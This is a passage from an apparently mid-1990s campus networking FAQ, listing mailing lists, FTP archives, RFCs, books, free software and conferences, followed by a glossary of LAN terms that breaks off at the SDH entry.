          b. NOVELL@LISTSERV.SYR.EDU
          c. CDROMLAN@IDBSU.BITNET/IDBSU.IDBSU.EDU
          d. BANYAN-L@AKRONVM.BITNET
          e. CW-EMAIL@TECMTYVM.BITNET    (Campus Wide E-mail)
          f. CWIS-L@WUVMD.BITNET         (Campus Wide Information Systems)
          g. IBM-NETS@BITNIC.BITNET
          h. LWUSERS@NDSUVM1.BITNET      (LANWatch User List)
          i. TN3270-L@RUTVM1.BITNET
          j. 3COM-L@NUSVM.BITNET
          h. HELP-NET@TEMPLEVM.BITNET    (Help re networking software)
          i. LANWORKS@MIAMIU.BITNET      (LanWorks PCSA stuff)
          j. LANMAN-L@NIHLIST.BITNET     (MS LAN MAN stuff)
      
        4. Internet Mailing Lists
      
            Send a subscription request for list foo to foo-request@blah
      
          a. big-lan@listserv.syr.edu             (gives you 2 ways)
          b. cisco@spot.colorado.edu
          c. p4200@comet.cit.cornell.edu          (Proteon routers)
          d. tcp-ip@nic.ddn.mil
          e. netblazer-users@telebit.com
          f. info-appletalk@andrew.cmu.edu
          g. net-ops@nsl.dec.com
          h. nfs@tmc.edu
          i. wellfleet-l@nstn.ns.ca
          j. ospf@trantor.umd.edu               (OSPF IP routing protocol)
          k. pop@jhunix.hcf.jhu.edu
          l. bind@ucbarpa.berkeley.edu
          m. pc-ip@udel.edu
          n. drivers@sun.soe.clarkson.edu       (Packet Drivers)
          o. cell-relay@indiana.edu         gatewayed to comp.dcom.cell-relay)
      
        5. Internet Mailing Lists with automatic subscription
      
           Send a "SUBSCRIBE" command to the listed server.
      
          a. firewalls@greatcircle.com          majordomo@greatcircle.com
                                                (about firewall routers)
          b. firewalls-digest@greatcircle.com   majordomo@greatcircle.com
                                                (same list in digested form)
      
        6. USENET/Netnews Groups
      
          a. comp.dcom.*          lans.*, modems, sys.cisco, telecom, ...
          b. comp.protocols.*     appletalk, tcp-ip.*, ibm, ppp, ...
          c. comp.sys.proteon
          d. comp.sys.novell
          e. comp.sys.mac.comm
          f. bit.listserv.big-lan  (Note: these groups give Netnews
          g. bit.listserv.novell     readers a way to read the corresponding
          h. bit.listserv.cwis-l      LISTSERV lists)
          i. bit.listserv.cw-mail
          j. bit.listserv.3com-l
          k. alt.dcom.*           catv, telecom, ...
      
        7. Anonymous FTP-based Archive Sites
      
          a. syr.edu: BIG-LAN mailing list; NOVELL mailing list; a collection
              of network-oriented papers & faq memos.
          b. spot.colorado.edu: cisco mailing list & some other network stuff
          c. hsdndev.harvard.edu: (in ndtl/results) Results of Scott
              Bradner's router benchmarks.
          d. ftp.uu.net: a treasure trove of software.
          e. wuarchive.wustl.edu: a treasure trove of software.
          f. ftp.ftp.com: packet drivers, some Unix software, other stuff.
          g. ftp.utexas.edu: collection of networking info & software--
              a lot of good information about Ethernet.
          h. ftp.novell.com: files Novell makes available.  Mirrored at
              netlab2.usu.edu, bnug.proteon.com, ftp.rg.nl, tui.lincoln.ac.nz.
          i. ftp.cisco.com: files Cisco makes available & some interesting
              applications.
          j. gatekeeper.dec.com: a treasure trove of software & stuff
              (the stuff that was on decwrl.dec.com).
          k. lux.levels.unisa.edu.au: files that 3Com distributes via
              Compuserve.
          l. ftp.unt.edu: Maas files and other goodies.
          m. oak.oakland.edu: "the simtel collection, formerly at
              simtel20.army.mil"; a treasure trove of software, including
              packet drivers (pd1:<msdos.pktdrvr>).  Mirrored on ftp.uu.net
              and wuarchive.wustl.edu.
          n. osi.ncsl.nist.gov: online copies of GOSIP & related documents.
      
        8. LISTSERV-based Archive Sites
      
           The brave can mail the command "INFO FILES" and/or the command
           "INFO DATABASE" to the LISTSERV for instructions.
      
          a. LISTSERV@LISTSERV.SYR.EDU: BIG-LAN & NOVELL mailing list archives.
      
        9. RFCs (Internet "Request For Comments")
      
           Some anonymous ftp sites for RFCs: nic.ddn.mil, ftp.nisc.sri.com,
           nis.nsf.net, nisc.jvnc.net, venera.isi.edu, wuarchive.wustl.edu,
           ftp.salford.ac.uk.
           There are also some mail-based file servers:
           mailserver@nisc.sri.com, info-server@nnsc.nsf.net, and
           sendrfc@jvnc.net.
      
          a. RFC1470: FYI on a network management tool catalog: Tools for
              monitoring and debugging TCP/IP internets and interconnected
              devices
          b. RFC1175: FYI on where to start: A bibliography of
              internetworking information
          c. RFC1594: FYI on Questions and Answers: Answers to Commonly asked
              "New Internet User" Questions
          d. RFC1178: Choosing a name for your computer
          e. RFC1207: FYI on Questions and Answers: Answers to commonly
              asked "experienced Internet user" questions
          f. RFC1244: Site Security Handbook
          g. RFC1118: Hitchhiker's Guide to the Internet
          h. RFC1122 & RFC1123: Requirements for Internet Hosts
          i. RFC1208: A Glossary of Networking Terms
          j. RFC1180: A TCP/IP Tutorial
          k. RFC1173: Responsibilities of Host and Network Managers:  A
              Summary of the Oral Tradition of the Internet
          l. IAB Official Protocol Standards (Currently RFC1540 but it is
              periodically updated & given a new RFC number)
          m. Assigned Numbers (Currently RFC1340 but it is periodically
              updated & given a new RFC number; Includes field-values for
              protocols in the TCP/IP family as well as some others)
          n. RFC1392: Internet User's Glossary
      
      
        10. Other Useful Online Papers
      
          a. Charles Spurgeon. "Network Reading List: TCP/IP, UNIX, and
              Ethernet".  Available via anonymous ftp from ftp.utexas.edu
              in directory pub/netinfo/docs as net-read.txt and netread-ps.
              Also available via electronic-mail-based archive server.  Send
              the word "help" in the subject header or body of a message
              to archive-server@ftp.utexas.edu for more information.
              Also available via www.
          b. Charles Hedrick. "Introduction to the Administration of an
              Internet-based Local Network".  Available via anonymous ftp
              from cs.rutgers.edu as runet/tcp-ip-admin.doc (also .ps).
          c. Charles Hedrick.  "Introduction to Internet Protocols."
              Available via anonymous ftp from cs.rutgers.edu as
              runet/tcp-ip-intro.doc (also .ps).
          d. Unofficial lists of codes used on 802.3 & Ethernet networks.
              Portions of the official list are not released, so various
              people compile unofficial lists.  One that is available via
              anonymous ftp is Michael Patton's pub/map/EtherNet-Codes
              on ftp.lcs.mit.edu.  See also RFC: "Assigned Numbers".
          e. Arthur Green: "Frequently Asked Questions for
              NOVELL@LISTSERV.SYR.EDU Mailing List."  Available via anonymous
              ftp from midir.ucd.ie.
          f. Brendan Kehoe: "Zen and the Art of the Internet: A Beginner's
              Guide to the Internet."  Available via anonymous ftp from
              ftp.cs.widener.edu in the pub/zen directory.
          g. ATM Bibliography.  Available via anonymous ftp from
              mythos.ucs.indiana.edu.
          h. John Wobus.  "Lan Mail Protocols".  Available via anonymous ftp
              from syr.edu under information/faqs/lan-mail-protocols
          i. John Wobus.  "Lan Technology".  Available via anonymous ftp from
              syr.edu under information/faqs/lan-technology
          j. Charles Spurgeon. "Guide to Ethernet".  Available via anonymous
              ftp from ftp.utexas.edu in pub/netinfo/ethernet as ethernet-guide.ps.
              See a above.
          k. Charles Spurgeon. "Guide to Ethernet Configuration".  Available via
              anonymous ftp from ftp.utexas.edu in pub/netinfo/ethernet as
              ethernet-config.ps.
      
      
        11. Sources of Protocol Documents
      
          a. Ethernet V2   DEC-Direct; 1-800-344-4825; DEC Part Number
                            AA-K759B-TK.
      
          b. IEEE 802      (802.3, Token Ring, 10BASE-T, etc) IEEE;
                            1-800-678-IEEE.
          c. TCP/IP        RFCs.  See RFCs (above).
          d. AppleTalk     APDA; 1-800-282-APDA.  Now a book in the
                            "Inside" series.
          e. OSI           Omnicom Inc.; 1-800-666-4266.
          f. DECNet        DEC.
          g. SNA           IBM.
          h. Novell(IPX)   Built on XNS; rest is designed by Novell.
          i. FDDI          ANSI; 1-212-642-4900.
                            Also Global Engineering Documents; 1-800-854-7179.
                            2805 McGaw Avenue; PO Box 19539; Irvine, CA 92714;
                            1-714-261-1455.
          j. CCITT         United Nations book shop in New York
                            Some of the documents are available via ftp from
                            world.std.com & ftp.uu.net & other sites.
          k. GOSIP         NTIS Sales Dept; (703)487-4650; Document
                            FIPS 146-1; See also Anonymous FTP-based Archive
                            Sites
          l. XNS           Xerox.
      
        12. Useful Free Software
           (see also RFC1470; listed above)
      
          a. CUTCP           (TCP/IP client for PCs) sun.soe.clarkson.edu,
                              omnigate.clarkson.edu
          b. NCSA Telnet     (Telnet clients for PCs & Macs) ftp.nsca.uiuc.edu
          c. Eudora          (POP3 Client for Macs) ux1.cso.uiuc.edu
          d. POPmail         (POP3 Client for PCs & Macs)
                              boombox.micro.umn.edu
          e. PCROUTE         (Makes IP router out of PC) accuvax.nwu.edu
          f. PCBRIDGE        (Makes bridge out of PC) accuvax.nwu.edu
          g. Packet Drivers  (Drivers for various PC LAN cards)
                              oak.oakland.edu
      
          h. WinQVT          (IP clients for Windows) ftp.cica.indiana.edu
          i. ka9q            (TCP/IP for PCs and Macs) ucsd.edu
          j. PC/IP           (TCP/IP client for MS-DOS) husc6.harvard.edu
          k. charon          (Pegasus/smtp gateway) omnigate.clarkson.edu
          l. CAP             (AppleTalk for Unix systems) rutgers.edu,
                              munnari.oz.au, gatekeeper.dec.com
          m. Popper          (POP3 server for Unix systems)
                              ftp.cc.berkeley.edu
          n. Trumpet         (PC Newsreader) oak.oakland.edu
          o. bootpd          (Bootp Daemon for Unix) lancaster.andrew.cmu.edu
          p. NUPOP           (POP3 daemon for MS-DOS) ftp.acns.nwu.edu
          q. NETWATCH        (PC Network watching program) netlab1.usu..edu
          r. iupop3          (POP3 server for VMS) mythos.ucs.indiana.edu
          s. Beholder        (PC Network watching program) ?
          t. KarlBridge      (PC-based filter bridge)
                              nisca.acs.ohio-state.edu
          u. Mosaic          (multifacited information/news client)
                              ftp.ncsa.uiuc.edu
          v. Gopher          (client/server information system) boombox?
          w. Pegasus         (Mail client for PCs & Macs) risc.ua.edu
          x. Kermit          (terminal emulator) Columbia U
          y. netatalk        (AppleTalk for UNIX Systems)  terminator.rs.itd.umich.ed
      u    z. etherman        (X-based Ethenet monitoring) ftp.cs.curtin.edu.au
          aa. interman        (X-based IP monitoring) ftp.cs.curtin.edu.au
          bb. packetman       (Ethernet packet analyzer) ftp.cs.curtin.edu.au
      
        13. Books
      
          The following books were mentioned by responders to the 12/93
          BIG-LAN Reader Survey as good books for administrators of
          Campus-sized LANs:
      
          a. Douglas Comer.  Internetworking with TCP/IP.
          b. Albitz & Liu.  DNS and BIND.
          c. Mark Miller.  Troubleshooting Internetworks.
          d. Ed Kroll.  The whole Internet.
          e. Marshall Rose.  The Simple Book.
          f. Craig Hunt.  TCP/IP Network Administration.
          g. Andrew Tanenbaum.  Computer Networks.
          h. Nemeth, Snyder & Seebass.  Unix System Administration Handbook.
          i. Stevens.  Unix Network Programming
          j. Martin A. W. Nemzow.  Keeping The Link (McGraw-Hill).
          k. Interconnections.  Radia Perlman
          l. Inside AppleTalk.
          m. Caroline Arms.  Campus Networking Strategies.  Digital Press.
              Out of print.
      
          Also mentioned were books published by O'Reilly in general.
      
        14. Periodicals
      
          The following periodicals were mentioned by responders to the 12/93
          BIG-LAN Reader Survey as good periodicals for administrators of
          Campus-sized LANs:
      
          a. Network World
          b. Data Communications
          c. LAN Magazine
          d. LAN Times
          e. Communications Week
          f. PC Week
          g. Network Computing
          h. InfoWorld
          i. ConneXions
          j. Byte
          k. Unix World
          l. Macworld
          m. MacWEEK
          n. PC Magazine
          o. Open Systems Today
          p. Network Management
          q. Lightwave
      
        15. Training Courses
      
          The following providers of tutorials were mentioned by responders
          to the 12/93 BIG-LAN Reader Survey:
      
          a. Interop Tutorials
          b. Cisco training
          c. Westnet training
          d. Network World: Understanding SNMP
          e. Trellis training
          f. TC3 Land/Wan Video
          g. TC3 NetWare 3.11
          h. PDA Data Communications
          i. Hewlett-Packard free seminars
          j. Fred Prior Project Management Seminars
          k. CRAY Research training program
          l. Banyan training
      
        16. Conferences
      
          The following conferences were mentioned by responders to the 12/93
          BIG-LAN Reader Survey as good conferences for administrators of
          Campus-sized LANs:
      
          a. Interop
          b. EDUCOM
          c. Networld
          d. Comnet
          e. Association of Banyan Users International
          f. ACUTA
      
      IV. Basic Glossary on Campus Networks
      
         Another glossary is RFC1208.  See "Online Papers" above.
      
           100BASE-T - A set of proposals to the IEEE 802.3 for 100Mbps
             Ethernet, called 100BASE-TX, 100BASE-TF, and 100BASE-T4.  A
             medium-independent interface and an adaptor is planned (to be
             used like the AUI and MAU of 10Mbps 802.3).  This is being
             developed & promoted by the Fast Ethernet Alliance.
      
           100BASE-T4 - Proposed IEEE 802.3 standard for a 100Mbps
             Ethernet-like network.  One of the flavors of "100BASE-T"
             proposed by the Fast Ethernet Alliance.  Uses 8B6T encoding and
             25MHZ clocking, and in addition to the two pairs traditionally
             used in the manner of 10BASE-T, also has two pair used in
             bidirectional half-duplex fashion.  Among other things, this
             means that this particular kind of Ethernet cannot be made full
             duplex without the use of more pair.  Formerly called 4T+.
      
           100BASE-TF - A proposal to IEEE 802.3 for a 100Mbps Ethernet-like
             network.  Borrows the physical characteristics of FDDI's
             multimode fiber PMD, but uses Ethernet framing & CSMA/CD.  One
             of three flavors of "100BASE-T" proposed by the Fast Ethernet
             Alliance.  Formerly part of 100BASE-X proposal.
      
           100BASE-TX - A proposal to IEEE 802.3 for a 100Mbps Ethernet-like
             network.  Borrows the physical characteristics of FDDI's TP-PMD,
             TP-PMD, but uses Ethernet framing & CSMA/CD.  One of three
             flavors of "100BASE-T" proposed by the Fast Ethernet Alliance.
             Formerly part of 100BASE-X proposal.
      
           100BASE-X - Old name for 100BASE-TF and 100BASE-TX.
      
           100Mbps Copper UNI - ATM Forum UNI specification for 100Mbps over
             some sort of copper cable.  I believe it is just 100MbpsUNI
             making use of FDDI's TP-PMD rather than the older fiber PMD.
      
           100Mbps UNI - ATM Forum 100Mbps multimode fiber private UNI.  Same
             as Fore's TAXI.  Borrows optical characteristics & basic
             encoding of FDDI.
      
           100VG-AnyLAN - "100VG-AnyLAN": Originally a proposal to IEEE 802.3
             for a 100Mbps Ethernet-like network, later relegated to IEEE
             802.12.  Formerly known as 100BASE-VG.  Uses Demand Priority
             media access method and Quartet Signaling.  I've also seen
             reference to its ability to use Category 4 UTP, Category 5 UTP,
             and STP, but I don't know how many pairs.
      
           100VG-AnyLAN Forum - Group of vendors trying to accelerate
             100VG-AnyLAN acceptance & interoperability.
      
           10BASE-F - Three variants of IEEE 802.3 which runs over multimode
             fiber.  See 10BASE-FB, 10BASE-FP, and 10BASE-FL.
      
           10BASE-FB - IEEE 802.3 10BASE-FB: "Synchronous Ethernet" which is
             a special-purpose multimode fiber link for linking repeaters
             that allows the repeaters to communicate more efficiently, thus
             enlarging the count of repeaters that can be placed in series
             above the traditional 4.  Described in IEEE 802.3 Section 17.
      
           10BASE-FL - IEEE 802.3 10BASE-FL: multimode fiber Ethernet used to
             attach a pair of devices (each being either a host or a
             repeater) as a "Link Segment"--a lot like 10BASE-T except that
             it uses fiber.  It makes FOIRL obsolete.  10BASE-FL transceivers
             can interoperate with FOIRL transceivers.  It is described in
             IEEE 802.3 Section 18.
      
           10BASE-FP - IEEE 802.3 10BASE-FP: passive star fiber Ethernet.
             Attaches a number of Ethernet devices together with a passive
             star hub (i.e., the hub is not electronic--it just splits the
             light travelling through each incoming fiber to go out all the
             outgoing fibers).  It is described in IEEE 802.3 Section 16.
      
           10BASE-T - A variant of IEEE 802.3 which allows stations to be
             attached via twisted-pair cable.
      
           155Mbps UNI - ATM Forum 155Mbps private UNI.  In two flavors:
             multimode and shielded twisted-pair.  The multimode version is
             incompatible with STS3cUNI.  This version is for private
             networks only and presumably will be less expensive.  I heard
             that a C5 version has been proposed.
      
           25Mbps UNI - IBM proposed copper interface for ATM that so far as
             been rejected by the ATM Forum.  IBM's proposal that borrows
             some of Token Ring's signaling characteristics.  I've read the
             statement that the ATM Forum doesn't support this proposal.
      
           4T+ - Old name for 100BASE-T4.
      
           51Mbps UNI - I don't know the actual name.  ATM Forum 51Mbps UNI
             for Category 3 UTP.  Uses AT&T's 16-CAP (a 16 constellation
             modem-type modulation scheme) line coding to transmit the
             signal.  The transmission convergence layer (framing) conforms
             to the STS-1 SONET standard.
      
           802, 802.x - see IEEE 802, IEEE 802.x.
      
           ANSI "American National Standards Institute" - A definer of
             standards of all kinds, including FDDI.
      
           ANSI X3 - ANSI group developing standards for information
             processing.
      
           ANSI X3T9 - ANSI group within X3 developing standards for I/O
             interfaces.
      
           ANSI X3T9.3 Committee - ANSI group within X3T9 standardizing HiPPI.
      
           ANSI X3T9.5 Committee - ANSI group within X3T9 that standardized
             FDDI, PMD, SMF-PMD, and is standardizing TP-PMD and LCF-PMD.
      
           AppleTalk - A protocol family developed by Apple Computer to
             implement LANs serving Macintoshes.
      
           ATM "Asynchronous Transfer Mode" - a method for switching little
             fixed-size packets (cells) around.  Like T1 and DS3, digitized
             voice was a major consideration in its design, but it can be
             used for data.  It can be run at different speeds over different
             media including T1 and DS3 as well as 51Mbps, 100Mbps, 155Mbps
             and 622Mbps standards (see SONET & TAXI).  The fixed cell size
             is 53 bytes.  Though ATM is really designed for voice and WANs,
             there are schemes to use it in LANs.  ATM is a big buzzword
             these days but it is still very new.
      
           ATM Forum - Non-profit international industry consortium chartered
             to accelerate ATM acceptance & interoperability.
      
           AUI "Attachment Unit Interface" - the Ethernet/IEEE 802.3 term for
             the interface between a MAU and a station.  A special kind of
             cable known as an "AUI Cable" can attach a MAU to a station at a
             distance (up to 50 meters).
      
           Backbone - a fairly nebulous term for a part of the network that
             interconnects other parts of the network.  For example, a campus
             might have an FDDI ring that interconnects a number of
             Ethernets.  The FDDI ring could be called the network's
             backbone.
      
           BNC Connector "Bayonet Neill-Concelman connector" - a type of
             connector used for attaching coax cable to electronic equipment
             which can be attached or detached quicker than connectors that
             screw.  ThinWire Ethernet (IEEE 802.3 10BASE2) uses BNC
             connectors.
      
           Bridge - A network "relay" which reads, buffers, and sends data to
             relay it from one data link to another, but makes the two data
             links appear as one to levels higher than the data link layer.
      
           Category 3 Unshielded Twisted Pair - standardization of unshielded
             twisted pair cable for voice use.  Some data communications
             standards such as 10BASE-T can utilize it.
      
           Category 4 Unshielded Twisted Pair - standardization of unshielded
             twisted pair cable.
      
           Category 5 Unshielded Twisted Pair - standardization of unshielded
             twisted pair cable for data use.  TP-PMD requires Category
             5 cable rather than Category 3.
      
           CDDI "Copper Data Distribution Interface" - Commonly used term
             for TP-PMD, but actually a trade name of Crescendo.
      
           Cell - An ATM 53-byte cell.  Note: there are various proposals for
             how typical packets will be broken into cells and restored.
      
           Cell Switching - a term for ATM-style networks.  See "ATM".
      
           CMIP "Common Management Information Protocol" - An OSI protocol
             for management of network equipment.  Not widely implemented.
             See SNMP.
      
           CMOT "CMIP over TCP/IP" - A protocol consisting of CMIP running
             under TCP/IP.  An alternative to SNMP.
      
           Coaxial Cable - any of a number of kinds of electrical
             communications cable designed so one conductor is in the center
             and the second conductor forms a ring around it.  Depending upon
             who you talk to, someone might have a specific kind of coaxial
             cable in mind.  Some well known kinds are various Cable TV
             cables, cables used by IBM 327x terminals and ARCNet, and cables
             used by Ethernet & IEEE 802.3.
      
           Collapsed Backbone - a network backbone that is located in a
             single room.  It might be a single router or multiport bridge,
             or a small LAN of some sort.  A typical collapsed-backbone-
             style campus LAN might consist of Ethernets in a number
             of buildings, each with a repeated fiber link into a single room
             at a central point where a router interconnects them.  An
             example of the opposite would be putting a router in each
             building and interconnecting them all with a big FDDI ring.
      
           Concentrator - a device which allows a number of stations to
             be connected to a LAN.  In the case of Ethernet, it is
             simply a multi-port repeater.  In the case of ring networks
             like Token Ring and FDDI, it acts as a switch which keeps
             the ring intact even if individual devices are unplugged.
      
           Counterrotating Ring - (see Ring, FDDI, Token Ring) a method of
             using two ring networks going in opposite directions to provide
             redundancy.  The network interfaces can change the path of the
             ring that the data flows around, thereby preserving the ring
             (thus the operation of the LAN) even if some of the cable is
             uplugged or cut, or if a device on the ring fails in such a way
             that it can't transmit data around the ring.
      
           DECNet - Trade name of Digital Equipment Corporation for some
             of their networking products.  It is a kind of network
             built out of Digital Equipment Corporations own networking
             protocols (with some standard protocols also used).
      
           Dialup Modem - Modem used over ordinary dial-up telephone lines
             as opposed to private or leased lines.
      
           DS3 UNI - ATM Forum DS3 UNI, 44.236Mbps.  Also called HSSI?
      
           DXI - ATM Forum "Data Exchange Interface".
      
           Ethernet - LAN data-link protocol developed by a consortium
             of vendors; later standardized as IEEE 802.3 with a few
             modifications.  For many applications, users have not adopted
             all the IEEE 802.3 differences.  Ethernet/802.3 now can be
             run on two types of coaxial cable as well as multi-mode
             fiber and unshielded twisted-pair.  "Raw" rate of data
             transmission is 10 megabits/second.
      
           Fast Ethernet Alliance - Group of vendors working on a 100Mbps
             version of IEEE 802.3.  They intend to submit their proposals
             for approval by the IEEE for a new set of 802.3 standards called
             100BASE-T.
      
           FDDI "Fiber Data Distribution Interface" - LAN data-link protocol.
             Designed to run on multi-mode fiber.  "Raw" rate of data
             transmission is 100 megabits/second.  Developed by the American
             National Standards Institute.
      
           FDDI-2 - Same speed, same fiber, same basic protocol as FDDI.
             FDDI-2 adds a layer which allows you to allocate fixed bandwidth
             to applications of your choice, making it more like broadband.
             FDDI-2 is still rather new.
      
           FDSE - Full Duplex Ethernet: a variant of Switched Ethernet which
             does not use CSMA/CD, but uses slightly-modified network
             interface cards to send & receive packets simultaneously.
             Presumably based on 10BASE-T for most clients, and cannot be
             based on ThinWire or ThickWire Ethernet.
      
           Fiber - optical fiber: a very long, narrow, flexible piece of
             glass.  Used for high-speed communications.
      
           Fibre Channel - an ANSI standard to replace HiPPI.  It uses optical
             fiber instead of copper cables.  Speeds are up to roughly
             1Gbps.
      
           Fibre Channel Systems Initiative - Group of vendors trying to
             accelerate Fiber Channel acceptance & interoperability.  Members
             include: HP, IBM, Sun.
      
           Firewall Router - a router which blocks traffic according to
             various criteria for security--for example a router which
             allows no telnet to any host through one of its interfaces
             but allows ftp to a list of authorized hosts through the
             same interface.
      
           FOIRL "Fiber Optic Inter-Repeater Link" - a standard for running
             IEEE 802.3 over fiber, linking two devices (each either a host
             or a repeater) as a "Link Segment".  It has been replaced by
             10BASE-FL.
      
           FTP - Protocol in the "TCP/IP" family for copying files from
             one computer to another.  Stands for "File Transfer Protocol".
      
           Full Duplex Switched Ethernet Consortium - Group of vendors that
             are working out the details of FDSE.  Cabletron is a member.
      
           Full Duplex Token Ring - IBM scheme to add switching to token-ring
             hubs that would allow full-duplex linking to individual
             computers using modified token-ring adaptors.  Has the same
             wiring characteristics as token ring.
      
           Gateway - A type of "network relay" that attaches two networks
             to build a larger network.  Modern "narrow" usage is that it
             is one that translates an entire stack of protocols, e.g.,
             translates TCP/IP-style mail to ISO-style mail.  Older usage
             used it for other types of relays--in particular, in the "TCP/IP"
             world, it has been used to refer to what many now insist is
             a "router".
      
           GOSIP "Government Open Systems Interconnect Profile" - A subset of
             OSI standards specific to US Government procurements, designed
             to maximize interoperability in areas where plain OSI standards
             are ambiguous or allow options.  Theoretically, required of all
             US Government networking procurements since mid-1990.
      
           Heartbeat - In Ethernet (Version 2), a test of the collision
             functionality of the transciever.  The term "Heartbeat" is often
             (wrongly) used interchangeably with "SQE" which is a similar
             function of IEEE 802.3.  See Question on SQE/Heartbeat below.
      
           HiPPI - "High Performance Parallel Interface", ANSI draft standard
             X3T9.3.
      
           HSSI "High Speed Serial Interface" -
      
           Hub - a nebulous term, typically applied to a multiport repeater
             or concentrator consisting of a chassis with slots to be
             populated by cards, allowing it to be configured with various
             numbers and combinations of LAN ports.  Vendors of networking
             equipment often also have other types of devices that can be
             inserted in the slots such as terminal servers, bridges,
             routers, gateways, etc.
      
           IEEE - Institute of Electrical & Electronic Engineers
      
           IEEE 802 - The set of IEEE standards for the definition of LAN
             protocols.  A story goes that a long time ago, IEEE and ANSI
             decided that IEEE would get the slow protocols and ANSI would
             get the fast ones, thus IEEE defined the 802 protocols and ANSI
             defined FDDI.  Presumably IEEE saw limited application for FDDI
             at the time.  Also, the IEEE standards-making committees
             associated with these standards.
      
           IEEE 802 Group within IEEE that standardizes LAN technologies.
      
           IEEE 802.1 - The IEEE 802 standard for Network Management and
             Network Bridging of IEEE 802 networks.
      
           IEEE 802.11 - Proposed IEEE 802 group for wireless Ethernet.
      
           IEEE 802.12 - Group within IEEE 802 working on 100VG-AnyLAN.
      
           IEEE 802.2 - An IEEE standard for the portion of LAN data-link
             protocols that is the same for all flavors of IEEE LAN
             protocols, e.g.  802.3 and 802.5.  Sometimes not used.
      
           IEEE 802.3 - An IEEE standard for LANs--their "improved" version of
             Ethernet.  See Ethernet.
      
           IEEE 802.3 - Group within IEEE 802 that standardizes CSMA/CD LANs.
      
           IEEE 802.4 - An IEEE standard for LANs: Token Bus networks.
             Basically, standardizes MAP, a protocol that operates a Token
             Bus protocol on broadband.
      
           IEEE 802.5 - An IEEE standard for Token-Ring-based LANs.  There
             are two types: 4Mbps and 16Mbps.  See also "Token Ring".
      
           IEEE 802.6 - An IEEE standard for Metropolitan Area Networks.  Also
             known as DQDB.
      
           IEEE 802.7 - IEEE 802 technical advisory group on Broadband.
      
           IEEE 802.8 - IEEE 802 technical advisory group on FDDI & fiber
             optics.
      
           IEEE 802.9 - IEEE 802 group on integrated data & voice networks.
      
           IMAP "Internet Mail Access Protocol" - TCP/IP-based protocol
             similar to POP, but with additional function designed to handle
             storage of mail on the server rather than the client.  There are
             two versions in common use: IMAP2 and IMAP4.
      
           IPX - Novell's protocol used by Netware.  Utilizes part of XNS.  A
             router with "IPX routing" purports to interconnect LANs so that
             Novell Netware clients & servers can talk through the router.
      
           LCF-PMD - FDDI "Low-Cost Fiber" PMD.  Less expensive than PMD.  I
             don't believe it is common nor is it finished as a standard.
      
           MAU "Media Adaptor Unit" - an IEEE 802.3 or Ethernet device which
             attaches a station to the cable.  Popularly called a
             "transceiver".  Can be attached by cable to the station or built
             into the station.
      
           MIB "Management Information Base" - the set of parameters an SNMP
             management station can query or set in an SNMP agent (e.g.
             router).  Standard, minimal MIBs have been defined (MIB I, MIB
             II), and vendors often have custom entries.  In theory, any SNMP
             manager can talk to any SNMP agent with a properly defined MIB.
      
           Multimode fiber - A type of fiber mostly used for shorter, e.g.
             campus distances.  It can carry 100 megabits/second for typical
             campus distances, the actual maximum speed (given the right
             electronics) depending upon the actual distance.  It is easier
             to connect to than Single Mode Fiber, but its limit on speed x
             distance is lower.
      
           NFS "Network File System" - an IP-based protocol originally
             developed by Sun Microsystems which provides file services.
      
           OCx - (e.g. OC1, OC3) variants of SONET.
      
           OSI "Open System Interconnect" - A standard put forth by the ISO
             for communication between computer equipment and networks.
      
           OSI Reference Model - A model put forth by the ISO for
             communication between computer equipment and networks, which
             maps out 7 protocol layers.
      
             Top layer:    layer number 7:   application layer
                           layer number 6:   presentation layer
                           layer number 5:   session layer
                           layer number 4:   transport layer
                           layer number 3:   network layer
                           layer number 2:   data-link layer (e.g. IEEE 802.x)
             Bottom layer: layer number 1:   physical layer (wire &
                                              electricity)
      
             This model explains what each layer does.  The model is often
             used to explain anyones protocols (not just OSI) to the point
             where many people seem to believe that true data-communications
             requires these 7 layers.
      
           PMD - FDDI "Physical Layer Medium Dependent" part.  When "PMD" is
             used by itself, it may refer to the usual kind of FDDI physical
             layer that uses multimode fiber.  Note that FDDI terminology
             also uses it as a more generic term, referring to different FDDI
             PMD's such as TP-PMD and SMF-PMD.
      
           POP "Post Office Protocol" - A TCP/IP-based protocol designed to
             allow client-stations (e.g. micros) to read mail from a server.
             There are three versions under the name "POP": POP, POP2, and
             POP3.  Latter versions are NOT compatible with earlier
             versions.
      
           Protocol - The "rules" by which two network elements trade
             information in order to communicate.  Must include rules about a
             lot of mundane detail as well as rules about how to recover from
             a lot of unusual communication problems.  Thus they can be quite
             complicated.
      
           Relay - One terminology uses the term "relay" as a device that
             interconnects LANs, different kinds of relays being repeaters,
             bridges, routers, and gateways.
      
           Repeater - In the "Ethernet" world, a "relay" that regenerates and
             cleans up signals, but does no buffering of data packets.
             It can extend an Ethernet by strengthening signals, but timing
             limitations on Ethernets still limit their size.
      
           RFC "Request For Comments" - The name is a real red herring when
             it comes to Internet RFCs.  Some really are "Requests For
             Comments" but all Internet protocol documents are stamped with
             an RFC number that they never shake, so the acronym RFC
             generally refers to documents that describe protocols in the
             TCP/IP family.
      
           RG numbers (E.g. RG62; sometimes there are qualifiers, e.g. RG 58
             A/U) a shorthand designation for military cable.  RG58 & RG62
             designate two different types of cable used by the military.
             Some data-communications equipment was designed to work with
             a particular military standard, e.g.  IBM 3270-type terminals
             use RG62.  In other cases, people use an RG-numbered cable
             that is close to what they need: for example ThinWire
             Ethernet & IEEE 802.3 10BASE2 define the type of cable they
             need and people sometimes substitute flavors of RG58, which
             are "close".  One can't recommend this practice because you
             can get yourself in trouble.  I think "RG" originally stood
             for "Radio Guide", presumably reflecting the fact that the
             series of cables was designed to handle radio frequencies.  The
             IEEE 802.3 10BASE2 specifications define two RG numbered cables
             (RG58 A/U and RG58 C/U) as meeting the cable requirements for
             thin Ethernet.  However, cable vendors may list a range of
             cables under these same RG numbers, and some of the cables
             listed may not meet the 802.3 specs.  You need to check the
             cable specifications closely, and beware of relying on the RG
             number alone when ordering network cables.
      
           Ring - A classification of network technology exemplified by
             Token Ring and FDDI.  The interconnected devices are connected
             one-to-another in the shape of a ring and data flows around
             it in one direction.  See also "Counterrotating Ring".
      
           RJ numbers ("Regestered Jack" numbers, e.g. RJ11, RJ45) - numbers
             applied to types of connectors often used in UTP wiring.
             Borrowed from voice telecommunications industry.
      
           Router - A network "relay" that uses a protocol beyond the
             data-link protocol to route traffic between LANs and other
             network links.
      
           Routing Protocol - a protocol sent between routers by which
             routers exchange information own how to route to various parts
             of the network.  The TCP/IP family of protocols has a bunch,
             such as RIP, EGP, BGP, OSPF, and dual IS-IS.
      
           SDH "Synchronous Digital Hierarchy" - Similar to SONET, but used
